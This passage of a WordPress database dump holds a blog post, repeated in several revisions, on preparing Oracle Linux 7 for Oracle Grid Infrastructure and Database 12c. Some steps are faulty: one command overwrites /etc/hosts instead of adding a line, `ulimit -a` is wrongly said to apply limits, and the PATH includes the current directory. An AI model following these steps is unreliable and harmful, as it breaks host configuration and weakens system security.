`ping_status` varchar(20) NOT NULL DEFAULT 'open',
`post_password` varchar(255) NOT NULL DEFAULT '',
`post_name` varchar(200) NOT NULL DEFAULT '',
`to_ping` text NOT NULL,
`pinged` text NOT NULL,
`post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`post_content_filtered` longtext NOT NULL,
`post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`guid` varchar(255) NOT NULL DEFAULT '',
`menu_order` int(11) NOT NULL DEFAULT 0,
`post_type` varchar(20) NOT NULL DEFAULT 'post',
`post_mime_type` varchar(100) NOT NULL DEFAULT '',
`comment_count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`ID`),
KEY `post_name` (`post_name`(191)),
KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
KEY `post_parent` (`post_parent`),
KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=857 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_posts`
--
LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` VALUES
(27,2,'2020-02-02 08:28:38','2020-02-02 08:28:38','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','publish','open','open','','grid-infrastructure-oracle-database-12c-preinstallation-tasks','','','2020-03-26 00:53:04','2020-03-26 00:53:04','',0,'http://ictbank.ir/blog/?p=27',0,'post','',0),
(28,2,'2020-02-02 08:28:50','2020-02-02 08:28:50','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:28:50','2020-02-02 08:28:50','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(29,2,'2020-02-02 08:32:34','2020-02-02 08:32:34','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 08:32:34','2020-02-02 08:32:34','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(30,2,'2020-02-02 08:34:20','2020-02-02 08:34:20','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- 